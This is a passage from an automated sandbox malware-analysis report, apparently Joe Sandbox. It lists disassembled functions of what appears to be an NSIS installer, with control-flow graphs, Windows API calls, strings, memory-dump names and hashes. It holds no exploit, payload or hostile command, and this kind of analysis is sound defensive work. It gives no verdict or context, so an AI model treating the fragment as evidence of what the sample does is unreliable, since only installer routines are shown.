                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                  • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                  • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                  • API String ID: 2435955865-3712954417
                                                                                                                                                                                  • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                  • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                  • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                  Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                  • String ID: jF
                                                                                                                                                                                  • API String ID: 2295610775-3349280890
                                                                                                                                                                                  • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                  • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                  • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                  Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 310444273-0
                                                                                                                                                                                  • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                  • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                  Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-401870 call 404f9e 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 174 401875-40188b call 406035 SetCurrentDirectoryW 164->174 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 174->57 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Call: %d, xrefs: 0040165A
                                                                                                                                                                                  • BringToFront, xrefs: 004016BD
                                                                                                                                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                  • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                  • Jump: %d, xrefs: 00401602
                                                                                                                                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                  • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                  • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                  • API String ID: 2872004960-3619442763
                                                                                                                                                                                  • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                  • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                  • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                  Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                  • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                  • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                                                  • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                  • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                  Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                  • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                  • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                  • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                  • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                    • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                  • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
